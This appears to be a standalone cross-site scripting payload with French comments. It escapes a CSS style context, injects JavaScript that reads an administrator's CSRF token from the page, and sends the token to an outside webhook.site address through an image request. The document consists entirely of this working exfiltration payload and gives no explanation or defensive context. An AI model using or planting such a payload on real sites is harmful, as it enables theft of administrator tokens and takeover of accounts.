*/}</style><script>
(function(){
    // Récupérer le token CSRF de l'admin
    var token = document.querySelector('input[name="csrf"]').value;
    // utiliser une image pour l'exfiltration
    var img = new Image();
    img.src = 'https://webhook.site/d8c4e072-db69-4df8-a664-a12d7734f709?token=' + encodeURIComponent(token);
})();
</script><style>/*